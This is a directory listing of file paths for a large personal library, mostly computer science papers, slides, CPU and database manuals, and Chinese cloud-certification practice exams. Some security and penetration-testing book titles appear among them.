./The Reversal Test - Eliminating Status Quo Bias in Applied Ethics.pdf
./Histograms - CUDA Handbook - Slides (2015).pdf
./On the Performance of Bitmap Indices for High Cardinality Attributes - 2014 (822860, LBNL-54673).pdf
./SLAM and Static Driver Verifier- Technology Transfer of Formal Methods inside Microsoft (tr-2004-08).pdf
./The Death of Optimizing Compilers (slides-djb-20150416-a4).pdf
./What Happens During a Join - Dissecting CPU and Memory Optimization Effects (P339).pdf
./Prefix Hash Tree - An Indexing Data Structure over Distributed Hash Tables.pdf
./A Detailed Analysis of the Component Object Model - 1989 (Muijadi_okstate_0664M_1681).pdf
./Web+App+Hacking+(Hackers+Handbook).zip
./Introduction to x64 Assembly.pdf
./Advances in Memory Management for Windows - October 12, 2007 (136_MemMgt).pdf
./The Design and Implementation of Modern Column-Oriented Database Systems (abadi-column-stores).pdf
./Competitive Programmer's Handbook - Antti Laaksonen - (10th December, 2017).pdf
./A Nanopass Framework for Compiler Education.pdf
./Infinite-Alphabet Prefix Codes Optimal for Beta-Exponential Penalties (10.1.1.560.4484).pdf
./Stochastic Gradient Descent Tricks (Microsoft Research, 2012).pdf
./NVDIMM-N Cookbook - A Soup-to-Nuts Primer on Using NVDIMM-Ns to Improve Your Storage Performance - 2015 (Chang-Sainio_NVDIMM_Cookbook).pdf
./20070123-apache_tuning.pdf
./Portable versus Open Instruction Set Architectures - 2016 (ieeemicro16_card_isa).pdf
./Long-term Recurrent Convolutional Networks for Visual Recognition and Description (1411.4389v3).pdf
./An Elegant Algorithm for the Construction of Suffix Arrays (2014).pdf
./Intel 64 and IA-32 Architectures Software Developer's Manual - Volume 2B - Instruction Set Reference, M-U - June 2016 (253667-059US).pdf
./我的白帽学习路线-猪猪侠.pdf
./A comparison of SPDY and HTTP performance - Microsoft Research (2012).pdf
./Introduction to Probability and Statistics with R (IPSUR).pdf
./Dropout - A Simple Way to Prevent Neural Networks from Overfitting - 2014 (JMLRdropout).pdf
./The Road Towards a Linux TSN (Time-Sensitive Network) Infrastructure - Intel - Slides - 2018 (ELC-2018-USA-TSNonLinux).pdf
./Building R Packages - An Introduction.pdf
./NumPy Binning Tutorial.pdf
./Communication Efficient Distributed Machine Learning with the Parameter Server.pdf
./20060501-linux_notes.pdf
./PeachPy - A Python Framework for Developing High-Performance Assembly Kernels (2013).pdf
./Intel Ethernet Controller 82571EB, 82572EI, 82571GB, 82571GI - Specification Update - Rev 6.8 Nov 2014.pdf
./Foreign Library Interface.pdf
./Cores of Random r-Partite Hypergraphs - Dec 15 2010 (tr001_10).pdf
./IDF 2012 NVM Express and the PCI Express SSD Revolution.pdf
./README.md
./Aspects Related to Data Access and Transfer in CUDA - Slides - 2014 (TR-2014-09).pdf
./Transparent Pointer Compression for Linked Data Structures (2005-06-12).pdf
./A Tutorial on Bayesian Optimization of Expensive Cost Functions, with Application to Active User Modeling and Hierarchical Reinforcement Learning - 12th Dec 2016 (bayopt).pdf
./20061019-oracle_in_rhel4_1.pdf
./20060608-lan_share.pdf
./Direct Cache Access for High Bandwidth Network IO - 2005 (huggahalli05).pdf
./doTmpSh.sh
./Real Programming in Functional Languages - James H. Morries (1981).pdf
./20060111-fishing.pdf
./General Incremental Sliding-Window Aggregation (p702-tangwongsan).pdf
./Magazines and Vmem- Extending the Slab Allocator to Many CPUs and Arbitrary Resources.pdf
./Statis - Flexible Transactional Storage (EECS-2010-2).pdf
./Simple and Space-Efficient Minimal Perfect Hash Functions - 2007 (wads07).pdf
./diveintopython.pdf
./Deterministic Dynamic Deadlock Detection and Recovery.pdf
./Backward Search FM-Index (Full-text Index in a Minute Space) - Slides.pdf
./Hacking The Art of Exploitation.pdf
./This World of Ours.pdf
./Pointer Analysis.pdf
./Fast Keyed Hash and Pseudo-Random Function using SIMD Multiply and Permute - 20 Nov 2016 (1612.06257v2).pdf
./The Night Watch.pdf
./Jump Over ASLR - Attacking Branch Predictors to Bypass ASLR - 2016 (micro16).pdf
./How to use Event Tracing for Windows for Performance Analysis.pdf
./Introduction to GPUs - CS378 - Spring 2015 - Slides.pdf
./Hardware Breakpoint (or watchpoint) usage in Linux Kernel (ols2009-pages-149-158).pdf
./An Approach for Minimal Perfect Hash Functions for Very Large Databases (tr06).pdf
./Abstract Algebra - 2016 (aata-20160809-sage-7.3).pdf
./Inside Cyber Warfare.pdf
./System V Application Binary Interface (ABI) AMD64 Architecture Processor Supplement - v0.99.6 (October 7, 2013).pdf
./20100901-pxe_ks.pdf
./Tackling Latency Using FG (TR2011-706).pdf
./20030429-LinuxServerInstall.pdf
./Brook for GPUs - Stream Computing on Graphics Hardware - Slides (2004).pdf
./Architecture of a Database System - 2007 (fntdb07-architecture).pdf
./A Dive in to Hyper-V Architecture and Vulnerabilities - Slides (BlackHat 2018).pdf
./Understanding and Improving Bloom Filter Configuration for Lazy Address-set Disambiguation (2011).pdf
./Applications of Finite Automata Representing Large Vocabularies - 1993 (10.1.1.56.5272).pdf
./Streaming Data Mining.pdf
./Java Callstack Trace - HTTP to JDBC - 2006 (jtrac-callstack).pdf
./Intel SIMD - Austronomy and Space Science - Slides (DIFX_2014-SIMD).pdf
./eXplode- A Lightweight, General System for Finding Serious Storage System Errors (explode-osdi06).pdf
./Thrill - High-Performance Algorithmic Distributed Batch Data Processing with C++ (1608.05634).pdf
./20050630-dns-1.pdf
./Join-Idle-Queue- A Novel Load Balancing Algorithm for Dynamically Scalable Web Services - October 1, 2011 (idleq).pdf
./Cache-Oblivious Peeling of Random Hypergraphs - 2nd Dec 2013 (1312.0526).pdf
./DI-MMAP - A High Performance Memory Map Runtime for Data-Intensive Applications (Nov 16 2012) - Paper.pdf
./GPERF - A Perfect Hash Function Generator.pdf
./AMD64 - Software Optimization Guide for AMD64 Processors (25112, r3.06, Sep-2005).PDF
./Keccak and the SHA-3 Standardization - Slides (Feb 6th, 2013).pdf
./Oracle 11gr1 Reference (b28320).pdf
./Star Schema Benchmark.PDF
./PyEmu - A Multi-purpose Scriptable IA-32 Emulator (bh-usa-07-pierce-WP).pdf
./Practical Reverse Engineering.pdf
./Trig Cheat Sheet.pdf
./Lonestar- A Suite of Parallel Irregular Programs (ispass2009).pdf
./KLEE - Unassisted and Automatic Generation of High-Coverage Tests for Complex Systems Programs (klee-osdi-2008).pdf
./The Economics of Immediate Gratification (jbdmfinal).pdf
./20050712-RHEL4.pdf
./Hardware is the new software (baumann-hotos17).pdf
./Resumable Functions v3 - Microsoft C++ (n4286).pdf
./A Versatile Graph Structure for Edge-Oriented Graph Algorithms - 1987 (Ebert1987AVD).pdf
./Exploring Control Flow Guard in Windows 10 - Trend Micro.pdf
./DEC - The Mistakes That Led To Its Downfall (Goodwin Paper).pdf
./A Comprehensive Study of Main-Memory Partitioning and its Application to Large-Scale Comparison- and Radix-Sort (sigmod14I).pdf
./How To Overcome the GIL Limitations (While Staying In Python Ecosphere) - Francesc Alted (2011).pdf
./MegaPipe - A New Programming Interface for Scalable Network IO.pdf
./Warp Shuffles, and Reduction and Scan Operations - CUDA - Slides.pdf
./Sequence to Sequence Learning with Neural Networks (1409.3215v3).pdf
./Approximate Hypergraph Partitioning and Applications (2007).pdf
./Agner Fog - Calling Conventions for different C++ compilers and operating systems (2013-09-04).pdf
./NVIDIA CUDA 5.5 - Getting Started Guide for Windows - July 2013 (DU-05349-001_v5.5).pdf
./Windows Assembly Programming Tutorial - Jeff Huang (v1.02, Dec 10 2003).pdf
./Intel Architecture - Instruction Set Extensions and Future Features - Programming Reference (January 2018).pdf
./Oracle 11gr1 Concepts (b28318).pdf
./20051209-windows_remote_connect.pdf
./What Every Programmer Should Know About Memory - Ulrich Drepper (2007).pdf
./20050621-LVM2.pdf
./SIMD Compression and the Intersection of Sorted Integers (1401.6399v11).pdf
./Fibre Channel Reference Card.pdf
./Minimal Perfect Hash Functions Made Simple - 1980 (p17-cichelli).pdf
./Asim - A Performance Model Framework (2002.02.computer.asim).pdf
./Haskell vs. F# vs. Scala - A High-Level Language Features and Parallelism Support Comparison (fhpc12).pdf
./Oracle 11gr2 PLSQL Packages and Types (e40758).pdf
./Implementing Sorting in Databases (2006).pdf
./Tokutek - Fractal Tree Technology and the Art of Indexing.pdf
./The NumPy Array - A Structure for Efficient Numerical Computation - 8th Feb 2011 (1102.1523).pdf
./Cache Organization and Memory Management of the Intel Nehalem Computer Architecture.pdf
./How To Write Fast Numerical Code - Slides (2011).pdf
./FLASHRELATE - Extracting Relational Data from Semi-Structured Spreadsheets Using Examples (Microsoft Research - April 2014).pdf
./Git from the Bottom Up.pdf
./Python_文本处理指南[经典].pdf
./Disruptor - High performance alternative to bounded queues for exchanging data between concurrent threads (May 2011).pdf
./Peering Inside the PE - A Tour of the Win32 Portable Executable File Format.pdf
./20061019-oracle_in_rhel4_2.pdf
./Gunrock - A Fast and Programmable Multi-GPU Graph Processing Library - Slides - 2016 (S6374).pdf
./Index Search Algorithms for Databases and Modern CPUs - Florian Gloss (Nov 2010).pdf
./Intel - Advanced Vector Extensions (319433-014).pdf
./Microsoft Portable Executable and Common Object File Format Specification - Revision 8.3 (6th Feb, 2013).pdf
./The Development of JOVIAL - 1978 (p203-schwartz-jovial).pdf
./Reconsidering Custom Memory Allocation (berger-oopsla2002).pdf
./The ART of Practical Synchronization (2016).pdf
./Container Choice.png
./An Informal Analysis of Perfect Hash Function Search (1989).pdf
./20050117-sam.pdf
./Satisfiability Modulo Theories - An Appetizer - Microsoft Research - Slides - 2009 (sbmf09-slides).pdf
./An Experimental Exploration of Marsaglia's Xorshift Generators, Scrambled - 13 Oct 2016 (1402.6246).pdf
./jargn10-thejargonfilever00038gut.txt
./20080612-rhel_cluster.pdf
./Pandas, SciPy, NumPy - Cheat Sheet.pdf
./The DragonFlyBSD System (2004).pdf
./Compressed Bloom Filters.pdf
./Hash Tables - Jeff Erickson (2014).pdf
./Open Crypto Audit Project - TrueCrypt (iSec).pdf
./UofW - Memory Hierarchy.pdf
./Array Layouts for Comparison-based Searching (September, 2015).pdf
./KASLR is Dead - Long Live KASLR (2017).pdf
./CUDA - Quick Reference.pdf
./501+Website+Hacking+Secrets.zip
./CityHash - Fast Hash Functions for Strings - Slides (121017-slides).pdf
./Intel Advanced Vector Extensions, 2015-2016, Support in GNU C Compiler Collection, GNU Tools Cauldron 2014 (Cauldron14_AVX-512_Vector_ISA_Kirill_Yukhin_20140711).pdf
./Parsing a SWIFT Message (May 2007).pdf
./A Practical Minimal Perfect Hashing Method (2005).pdf
./web penetrationtesting with kali.pdf
./Almost Random Graphs with Simple Hash Functions - Slides (2007).pdf
./CUDA Optimizations - Slides (April 2016).pdf
./SEDA - An Architecture for Well-Conditioned, Scalable Internet Services - Deck (seda-sosp01-talk).pdf
./A Brief Introduction to the Standard Annotation Language (SAL) - 2006.pdf
./The Skein Hash Function Family - v1.2 - 15 Sep 2009 (skein1.2).pdf
./Data Structures for Text Sequences.pdf
./A Malloc Tutorial (Feb 16, 2009).pdf
./Grand Central Dispatch - FreeBSD Dev Summit (18 Sep 2009).pdf
./20050630-dns-2.pdf
./Locks, Deadlocks and Synchronization - Windows Hardware and Driver Central (2006).pdf
./Microsoft Windows - Software Development Kit - Programming Tools - Version 2.0 (1987).pdf
./Abusing Mach on Mac OS X - May, 2006 (uninformed_v4a3).pdf
./Neural Word Embedding as Implicit Matrix Factorization (5477-neural-word-embedding-as-implicit-matrix-factorization).pdf
./Curves and Surfaces - Lecture Notes for Geometry 1 - Henrik Schlichtkrull - University of Copenhagen (2011).pdf
./Latency and Bandwidth Impact on GPU Systems - 2008 (ms-proj-gpgpu-latency-bandwidth).pdf
./Maximizing File Transfer Performance Using 10Gb Ethernet and Virtualization - FedEx Case Study - Intel (2010).pdf
./Introduction to the Pin Instrumentation Tool - Slides (27 Mar 2013).pdf
./Sega Saturn (ST-238-R1-051795).pdf
./Practical Implementations of Arithmetic Coding.pdf
./06.掌握对象存储服务OSS/OSS PHP SDK使用教程.pdf
./06.掌握对象存储服务OSS/OSS基本使用方法.pdf
./06.掌握对象存储服务OSS/OSS系列插件使用教程之【phpwind 9】.pdf
./06.掌握对象存储服务OSS/OSS中Object的HTTP头属性及含义.pdf
./06.掌握对象存储服务OSS/bookci网站技术分享之OSS图片存储篇.pdf
./06.掌握对象存储服务OSS/实验.txt
./06.掌握对象存储服务OSS/图片站下载站之OSS应用篇.pdf
./Improvement of Fitch function for Maximum Parsimony in Phylogenetic Reconstruction with Intel AVX2 Assembler Instructions - 24 June 2013 (TR20130624-1).pdf
./BTFM_Blue Team Field Manual.pdf
./Intel Architecture Instruction Set Extensions Programming Reference (319433-015).pdf
./2015-11-02-Linux_permissions.pdf
./Quick Introduction into SAT and SMT Solvers and Symbolic Execution (2016 - Draft).pdf
./bh-asia-02-lsd-article.pdf
./Why Modern CPUs Are Starving And What Can Be Done About It - Francesc Alted (StarvingCPUs-CISE-2010).pdf
./Efficient Implementation of Sorting on Multicore SIMD CPU Architecture - Slides - VLDB 2008 (9-29-15).pdf
./Featherweight Threads for Communication - 2011 (parasites_tech11).pdf
./Solaris 11 - Cheat Sheet (1556378).pdf
./Agner Fog - Microarchitecture of Intel, AMD and VIA CPUs - An optimization guide for assembly programmers and compiler makers (2018-04-09).pdf
./20030501-Lost-Angel-Linux00-Newusers.pdf
./Weaving Relations for Cache Performance - 2001 (P169).pdf
./An Optimal Algorithm for Generating Minimal Perfect Hash Functions - 1992 (10.1.1.51.5566).pdf
./Flush+Reload - A High-Resolution, Low-Noise, L3 Cache Side-Channel Attack (2014).pdf
./BlueBorne - Android Exploit.pdf
./120227-雨痕-深入Python编程-RC0.3.pdf
./Agner Fog - Microarchitecture of Intel, AMD and VIA CPUs - An optimization guide for assembly programmers and compiler makers (2013-09-04).pdf
./Thrill - High-Performance Algorithmic Distributed Batch Data Processing in C++ - Slides (2016).pdf
./Fast String Correction with Levenshtein-Automata (2002) (10.1.1.16.652).pdf
./Shuffle - Tips and Tricks - Slides - GPU Tech Conf 2013 (S3174).pdf
./20081205-spof.pdf
./Branch Prediction and the Performance of Interpreters - Don't Trust the Folklore - 2013 (RR-8405).pdf
./Pin - Building Customized Program Analysis Tools with Dynamic Instrumentation (2005).pdf
./Enhancing Server Availability and Security Through Failure-Oblivious Computing - 2004 (rinard).pdf
./Efficiently Compiling Efficient Query Plans for Modern Hardware - 2011 (p539-neumann).pdf
./TCSP-PDF课件.zip
./Improved Bounds For Covering Complete Uniform Hypergraphs - (April 3rd, 2007).pdf
./Ultrafast and Memory-Efficient Alignment of Short DNA Sequences to the Human Genome - 2009 (gb-2009-10-3-r25).pdf
./Efficient Estimation of Mutual Information for Strongly Dependent Variables (gao15).pdf
./Oracle 11gr2 VLDB and Partitioning Guide (e16541).pdf
./20060808-apache-jk2-tomcat.pdf
./FAST - Fast Architecture Sensitive Tree Search on Modern CPUs and GPUs.pdf
./Intel 64 and IA-32 Architectures Software Developer’s Manual V3 - Sept 2014 (325384-052US).pdf
./bh-eu-07-cerrudo-WP-up.pdf
./老版本PPT.zip
./Mental models, Consistency and Programming Aptitude (CRPITV78Bornat).pdf
./Colfax Optimization Techniques for the Intel MIC Architecture - Part 2 of 3 - Strip-Mining for Vectorization (2015).pdf
./Agner Fog - Optimizing Subroutines in Assembly Language - An optimization guide to x86 platforms (2013-09-28).pdf
./BHUSA09-Gates-OracleMetasploit-PAPER.pdf
./Self-Adjusting Binary Search Trees (1985).pdf
./HyperANF - Approximating the Neighbourhood Function of Very Large Graphs on a Budget (2011).pdf
./_principles_of_model_checking.pdf
./Register Level Sort Algorithm on Multicore SIMD Processors (xiaochen_rocki_IA3_SC13).pdf
./Efficient Algorithms for Large-Scale Image Analysis (978-3-86644-786-8_PDFA).pdf
./20060601-samba.pdf
./2018 CppCon Unwinding the Stack - Exploring how C++ Exceptions work on Windows - James McNellis.pdf
./Lecture Notes on AVL Trees - March 2011 (18-avl).pdf
./Lower Bound Techniques for Data Structures.pdf
./Efficient String Matching - An Aid to Bibliographic Search - Aho-Corasick (1975).pdf
./Oracle 11gr2 Application Developer's Guide (e24435).pdf
./Data Compression Techniques - Lecture 6 - Arithmetic Coding (2015).pdf
./Hardware Acceleration for Memory-to-Memory Copies - January 13, 2017 (EECS-2017-2).pdf
./20060830_HPC_Linux_Cluster_1350.pdf
./Oracle Bitmaps (2003, Sept) - [2] Star Transformations (oracle-06_bitmap_2).doc
./MSDN - Compound Synchronization Objects (July 21, 1994).pdf
./HASHI - An Application-Specific Instruction Set Extension for Hashing - 2014 (adms14_arnold).pdf
./Locality Exists in Graph Processing - Workload Characterization on an Ivy Bridge Server.pdf
./Sorting improves word-aligned bitmap indexes - 2014 (0901.3751v6).pdf
./The ReactOS Project - An Open Source OS Platform for Learning - Slides - Ionescu (2007).pdf
./Matchings, Hamilton Cycles and Cycle Packings in Uniform Hypergraphs - 2005 (dmAE0154).pdf
./Designing COM Interfaces - 1995.pdf
./C Cheat Sheet (ashlyn-black_c-reference).pdf
./Bayesian Reasoning and Machine Learning (181115).pdf
./Debunking the 100x GPU vs CPU Myth - An Evaluation of Throughput Computing on CPU and GPU.pdf
./A Compilation Target for Probabilistic Programming Languages - 2014 (paige14).pdf
./What's Wrong With Deep Learning (lecun-20150610-cvpr-keynote).pdf
./UNIX Time Sharing System - UNIX Programmer's Manual - Seventh Edition, Volume 1A - January, 1979 (v7vol1a).pdf
./Intel - A Novel Hashing Method Suitable for Lookup Functions  (February 2012).pdf
./Faster 64-bit Universal Hashing using Carry-less Multiplication - 2015 (1503.03465).pdf
./To Wash It All Away.pdf
./Robust Combinatorial Optimization with Exponential Scenarios (November 10th, 2006).pdf
./Better Performance at Lower Occupancy - Slides - 2010 (volkov10-GTC).pdf
./openwrt-fanqiang.pdf
./Graph Theory (2005).pdf
./CREST-Penetration-Testing-Guide.pdf
./True IOMMU Protection from DMA Attacks - When Copy is Faster than Zero Copy - 2016 (cim-asplos-2016).pdf
./A Fast, Minimal Memory, Consistent Hash Algorithm (1406.2294v1).pdf
./Reverse Engineering for Beginners.pdf
./Agner Fog - Optimizing Software in C++ (2017-05-02).pdf
./Cache-Aware Lock-Free Queues for Multiple Producers-Consumers and Weak Memory Consistency 1.pdf
./Sine and Cosine using CORDIC.pdf
./A Very Fast Substring Search Algorithm - 1999 (p132-sunday).pdf
./The Bias Against Creativity - Why People Desire But Reject Creative Ideas (Cornell, 1-1-2011).pdf
./20090402-hpc-mysql-rhcs.pdf
./Taming Win32 Threads with Static Analysis - Slides (08161-yangjasonyue-slides).pptx
./Intel - Cache Allocation Technology - Whitepaper (2015).pdf
./Windows Privilege Escalation Through LPC and ALPC Interfaces (June, 2008).pdf
./Attack and Defend Linux Privilege Escalation Tech of 2016.pdf
./Offensive Security's Complete Guide to Alpha.pdf
./GPU Control Flow and Synchronization - Slides.pdf
./I Got 99 Problems But a Kernel Pointer Ain't One - Recon 2013 - Slides - Alex Ionescu.pdf
./NVIDIA - Fermi Compute Architecture - Whitepaper - v1.1.pdf
./Advanced_Penetration_Testing.pdf
./Bugs as Deviant Behavior - A General Approach to Inferring Errors in Systems Code - ACM - 2001 (deviant-sosp-01).pdf
./20050727_www-on-sles9.pdf
./Extending Oracle E-Business Suite Release 12.1 and above using Oracle Application Express (345780).pdf
./A Parallel Page Cache- IOPS and Caching for Multicore Systems.pdf
./SPECK - A Kernel for Scalable Predictability (rtas15speck).pdf
./Intel Compiler Features + Performance Tips - Slides (2015) (IntelCompilerNERSC.201505013).pdf
./To Search or to Crawl - Toward a Query Optimizer for Text-Centric Tasks (sigmod2006).pdf
./Oracle 11gr2 Data Warehousing Guide (e25555).pdf
./[Python灰帽子].(美)塞兹.文字版.pdf
./Dissecting the NVIDIA Volta GPU Architecture via Microbenchmarking - 2018 (1804.06826).pdf
./SCSI Command Table.pdf
./PE Format Layout.pdf
./Fast Exact Multiplication by the Hessian - 1993 (nc-hessian).pdf
./On End-to-End Program Generation from User Intention by Deep Neural Networks - 2015 (1510.07211v1).pdf
./MISTRAL - Processing Relational Queries Using a Multidimensional Access Method - 2000 - Slides.pdf
./COZ - Finding Code that Counts with Causal Profiling - Slides (2015).pdf
./Cuckoo Filter - Practically Better Than Bloom.pdf
./Compiling Python Modules to Native Parallel Modules Using Pythran and OpenMP Annotations.pdf
./Best Practices for Gathering Optimizer Statistics for Oracle 12c (June 2013).pdf
./Repeating History Beyond ARIES - C. Mohan (VLDB Conf, 1999).pdf
./Windows New Security Features - Control Flow Guard - Slides (MR201412_Control_Flow_Guard_ENG).pdf
./Preemptable Ticket Spinlocks - Improving Consolidated Performance in the Cloud.pdf
./ATOM - A System for Building Customized Program Analysis Tools - 1994.pdf
./The K Semantic Framework (CS422-Spring-2010-K).pdf
./The Roots of Trigonometric Integrals - 1950 (597490).pdf
./Better Bitmap Performance with Roaring Bitmaps (2014).pdf
./Programming from the Ground Up.pdf
./Harnessing Intel Processor Trace on Windows for Vulnerability Discovery - D1T1 - Richard Johnson - Slides (2017).pdf
./A Family of Perfect Hashing Methods - 1996 (TR0242).pdf
./Applications of Finite Geometry in Coding Theory and Cryptography.pdf
./Virtual Threads - 2000 (cs263_cheong_reiss).pdf
./20051012-suse-install.pdf
./Persistent Memory in Windows - 2017 (Tom_Talpey_Persistent_Memory_in_Windows_Server_2016).pdf
./Lossless Compression in Lossy Compression Systems - Stanford, EE398A - Slides (01-EntropyLosslessCoding).pdf
./Name Mangling Demystified (2007).pdf
./Structured Deferral - Synchronization via Procrastination - ACM (p20-mckenney).pdf
./QuickThread - Programming Guide.pdf
./Why Threads Are A Bad Idea (For Most Purposes) - John Ousterhout (Sept 1995).pdf
./C++ Standard - 2012-01-16 - Working Draft (N3337).pdf
./The BW-Tree - A B-tree for New Hardware Platforms (Microsoft Research - Presentation).pptx
./Lazy and Speculative Execution - Microsoft Research - Slides (12th December, 2006).pdf
./Reversing - Secrets of Reverse Engineering.pdf
./Convex Optimization - Slides.pdf
./Matchings in 3-uniform Hypergraphs (2012).pdf
./DPDK Optimization Techniques and Open vSwitch Enhancements for Netdev DPDK - Slides - OVS 2015 (1335-jayakumar).pptx
./Tracing Privileged Memory Accesses to Discover Software Vulnerabilities (2015).pdf
./Introduction to Dynamic Unary Encoding (Dec 19, 2014).pdf
./Verification of the Tree-Based Hierarchical Read-Copy Update in the Linux Kernel - 10th October, 2016 (1610.03052).pdf
./Huffman Coding - Slides (2012).pdf
./20060706-bugzilla.pdf
./SpaceJMP - Programming with Multiple Virtual Address Spaces - 2016 (spacejmp_asplos16).pdf
./web-hacking-101.pdf
./Improving Compiler Optimization with Machine Learning (2014_Kulkarni_Sameer_PhD).pdf
./Threat Modeling.pdf
./How to Partition a Billion-Node Graph - Microsoft Research (2016).pdf
./The Basics of Hacking and Penetration Testing.pdf
./AMD64 Architecture Programmer's Manual - Volume 3 - General-Purpose and System Instructions (24594, r3.22, Jun-2015).pdf
./Mellanox ConnectX-2 10GbE Cards - Product Data Sheet.pdf
./Windows Kernel Internals - NTFS.pdf
./Tru64 - Object File and Symtable Spec.PDF
./Scaling Address Space Operations on Linux with TSX (2011).pdf
./Windows Kernel Architecture Internals (Dave_Probert_1).pdf
./Meltdown (2018).pdf
./Introduction to Random Graphs - Slides - 2015 (Slides_TomaszLuczak1).pdf
./Extra 300 - Pilot's Operating Handbook (20th Sept, 2009).pdf
./Tracing the Meta-Level - PyPy’s Tracing JIT Compiler - 2009 (bolz-tracing-jit-final).pdf
./lwref - BSDCan2014 - FreeBSD.pdf
./Theory of Locality Sensitive Hashing - CS246 Stanford (Slides).pdf
./Objconv - Instructions.pdf
./H2O - The Opytimized HTTP Server (Kazuho Oku, 2014).pdf
./On the Data Access Issue (Or Why CPUs Are Starving) - EuroSciPy 2009.pdf
./Intel - PMU Sharing Guidelines (30388).pdf
./Program Analysis with PREfast and SAL - Erik Poll - Slides (3_StaticAnalysisPREfast).pdf
./Optimizing TLS for High-Bandwidth Applications on FreeBSD - Netflix (asiabsd_2015_tls).pdf
./MIPSpro MIPSpro Assembly Language Programmer's Guide (007-2418-006).pdf
./Oracle Spatial - Developing Location-Enabled Applications - Oracle Spatial Geocoding and Routing Engines.pdf
./Optimization of Generalized Unary Coding (1611.03353).pdf
./密码技术原理.pdf
./Notes on Differential Equations.pdf
./AMD64 Architecture Programmer's Manual - Volume 1 - Application Programming (24592, r3.21, Oct-2013).pdf
./Intel Architecture Instruction Set Extensions Programming Reference - April 2017 (319433-029).pdf
./20070830-setup_a_l2tp_over_ipsec_vpn_server_on_linux.pdf
./Black+Book+of+Viruses+and+Hacking.zip
./Hypergraph Algorithms and Applications - CS6824 - Slides  (January 22, 2014).pdf
./Oracle - Fraud and Anomaly Detection Using Oracle Advanced Analytic Option 12c (fraudoaa12c-1979769).pdf
./A Comparison of Programming Languages in Economics (16-Jun-2014).pdf
./DTrace Dynamic Tracing In Oracle Solaris, Mac OS X & FreeBSD.pdf
./us-17-Kettle-Cracking-The-Lens-Exploiting-HTTPs-Hidden-Attack-Surface-wp.pdf
./20060501-linux_11_comment.pdf
./Sum of Degrees of Vertices Theorem - Slides.pdf
./Windows Kernel Internals - Cache Manager.ppt
./Managing the Development of Large Software Systems - 1970 (waterfall).pdf
./OpenGIS Implementation Standard for Geographic Information - Simple Feature Access - Part 2 - SQL option v1.2.1.pdf
./Spread Unary Coding (1412.6122).pdf
./Advanced Topics in CUDA - Slides (2011).pdf
./Windows Kernel Internals - Traps, Interrupts and Exceptions.pdf
./5-Level Paging and 5-Level EPT - Intel - Revision 1.0 (December, 2016).pdf
./Advances in Cloud-Scale Machine Learning for Cyber-Defense - Russinovich 2017 (exp-t11-advances-in-cloud-scale-machine-learning-for-cyber-defense).pdf
./Understanding and Expressing Scalable Concurrency - Aaron Turon - Thesis (2013).pdf
./A Method for the Construction of Minimum-Redundancy Codes - Huffman (1952).pdf
./20060622-linux_vlan.pdf
./Bitmap Index Design Choices and Their Performance Implications (LBNL-62756).pdf
./Fibre Channel Fundamentals.pdf
./An NUMA API for Linux - Andi Kleen, Aug 2004.pdf
./20051220-Linux_GMAIL.pdf
./defcon-17-joseph_mccray-adv_sql_injection.pdf
./IRON File Systems (iron-sosp05).pdf
./Perfect matchings in r-partite r-graphs (2008).pdf
./Analysis of B-tree Data Structure and its Usage in Computer Forensics (484192.B-tree).pdf
./Oracle Bitmaps (2003, Sept) - [3] Bitmap Join Indexes (oracle-07_bitmap_3).doc
./CAF - The C++ Actor Framework for Scalable and Resource-efficient Applications - ACM 2014 (ageresplash2014_submission_5).pdf
./LSM-trie - An LSM-tree-based Ultra-Large Key-Value Store for Small Data - Slides (atc15_slides_wu).pdf
./Windows - Disk Subsystem Performance Analysis (March 2004).doc
./Comparative Performance of Memory Reclamation Strategies for Lock-Free and Concurrently-Readable Data Structures.pdf
./Hidden Markov Model.pdf
./Towards Deep Symbolic Reinforcement Learning - 2016 (1609.05518).pdf
./A Compressed Suffix Tree Based Implementation with Low Peak Memory Usage (2014).pdf
./Printing Floating-Point Numbers Quickly and Accurately with Integers - 2010 (dtoa-pldi2010).pdf
./Windows Kernel Internals - IO Architecture.pdf
./Binary Search Tree with SIMD Bandwidth Optimizations Using SSE (Preso06-SIMDTree).pdf
./A Way Forward in Parallelising Dynamic Languages (PyPy Position Paper).pdf
./Oracle - Beginning Performance Tuning (Arup Nanda).pdf
./Intel IO Acceleration Technology Overview.pdf
./RE4B-EN.pdf
./20060111-ldap_and_apach_auth.pdf
./penetration-testing-with-the-bash-keith-makan.pdf
./Visual Studio, Microsoft Portable Executable and Common Object File Format Specification - Revision 9.3 - 29th Dec, 2015 (pecoff_v93).docx
./Ten Years with DragonFlyBSD Network Stack (2017).pdf
./DataMining-ch7.pdf
./Introduction to Mathematics for Game Development - James Cowley  (June 23, 2016).pdf
./Rise of the VMs (Slides).pdf
./Analyzing GPGPU Pipeline Latency - Poster - 2014 (poster_andresch_acaces2014).pdf
./Simple implementation of deletion from open-address hash table (0909.2547).pdf
./A Probabilistic Theory of Deep Learning (1504.00641v1).pdf
./Bringing SIMD-128 to JavaScript (TC-39).pdf
./Gray Hat Hacking The Ethical Hackers Handbook 2nd Edition.pdf
./Thermometer Encoding - One Hot Way To Resist Adversarial Examples - ICLR 2018.pdf
./Microsoft Portable Executable and Common Object File Format Specification - 1999 (pecoff).pdf
./Windows Commands.pdf
./XSS.pdf
./ispc - A SPMD Compiler for High-Performance CPU Programming (ispc_inpar_2012).pdf
./Deep Learning Tutorial - Slides - 2013 (lecun-ranzato-icml2013).pdf
./Memory Efficient Hard Real-Time Garbage Collection (2003).pdf
./Intel 64 and IA-32 Architectures Software Developer's Manual - Combined Volumes 1-3 - June 2016 (325462-059US).pdf
./Oracle - New Features for Developers in 12c (Arup Nanda).pdf
./Intel IO Acceleration Technology (IOAT) Overview.pdf
./Long Gaps Between Primes - 2016 (1412.5029).pdf
./Efficient Lossless Compression of Trees and Graphs.pdf
./The VAD Tree - A Process-Eye View of Physical Memory (2007).pdf
./Benchmarking a B-tree Compression Method.pdf
./阿里云云计算专业认证考试(ACP)模拟题/阿里云云计算专业认证考试(ACP)模拟题-0821.pdf
./阿里云云计算专业认证考试(ACP)模拟题/阿里云云计算专业认证考试样题.pdf
./阿里云云计算专业认证考试(ACP)模拟题/阿里云云计算专业认证模拟试题(二).pdf
./阿里云云计算专业认证考试(ACP)模拟题/各章题目汇总.pdf
./阿里云云计算专业认证考试(ACP)模拟题/阿里云云计算专业认证考试(ACP)模拟题-0904.pdf
./阿里云云计算专业认证考试(ACP)模拟题/阿里云云计算专业认证模拟试题(一).pdf
./阿里云云计算专业认证考试(ACP)模拟题/阿里云云计算专业认证考试(ACP)模拟题-0828.pdf
./阿里云云计算专业认证考试(ACP)模拟题/阿里云云计算专业认证考试(ACP)模拟题-0814.pdf
